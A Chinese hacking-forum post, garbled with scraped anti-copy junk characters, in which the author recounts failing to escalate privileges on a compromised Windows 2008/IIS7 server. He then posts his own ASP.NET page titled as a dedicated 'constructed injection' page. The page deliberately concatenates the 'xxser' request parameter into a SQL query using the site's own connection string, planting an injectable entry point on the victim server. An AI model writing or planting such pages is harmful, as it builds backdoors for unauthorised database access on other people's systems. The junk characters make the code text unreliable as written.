昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
( {, j7 y/ M/ E: y其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
1 M+ X( r5 I, A& E* k( S( V6 e代码量不多,自己写个拉倒了。烦死了。
" c4 n) o/ W- W1 f4 ?2 I' k+ @3 Z2 u6 N' Q
5 I; O( x' q) b7 O0 V7 U' [
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
# b3 F+ U& J/ K% ^+ a1 W6 ]<html xmlns="http://www.w3.org/1999/xhtml">) _5 e* l3 V3 L3 [1 I% V" \+ T* w
<head runat="server">5 v% t# a9 z% l( U* j3 f
<title>暗影aspx构造注射专用页面</title> r5 e$ w" r( h6 w0 m
</head>% u: H" Z9 Q8 k% Q0 y) U+ @! e
<body>
; C1 E' [/ { v5 ~5 b2 N( I5 S <form id="form1" runat="server">5 u/ y# P/ [# ]3 X3 z* S& w
<div>: E( K* z! K5 x
<script language="c#" runat="server">
5 U6 i5 c" C, S q
+ |0 K5 T) C8 F9 O( j8 N1 o1 W void page_init(object sender, EventArgs e)( s# y4 [1 c; y9 J/ ~
{
- g! W* [% r" N $ A, D8 Z2 w9 |1 u
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();/ U; q: b2 ]6 h+ a
3 l- i" Z* z3 ]& G; q" R
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
7 v5 a. k: v) {0 K conn.Open(); b" U7 K. y( h! c6 H
, B1 }/ C6 G- I# N& S
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=10 g j& Y1 A. Y, }' X
% ?2 ^) G7 M# f9 K
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
- c0 N5 n( \9 B3 b3 A: O/ d# {* q int x = command.ExecuteNonQuery();; r- k4 U! T4 T" \
Response.Write(i+"\n");
9 f `5 ` W1 @ t" ]$ y Response.Write(x);: L8 ` ^8 W- y
conn.Close();5 r9 e- I% l5 C
}
0 g+ h" p$ q* y# B9 r+ F8 w' a
) e: s6 n6 k5 v$ q9 h </script>
, \) Z( _3 f4 g' Z </div>
, M A" D2 u" j- c5 v& v$ v( H </form>
4 [: D! v2 y% u</body>
* u: v* Y, |2 I% \</html>2 ~4 I5 O- K3 B0 U+ z% C/ h
|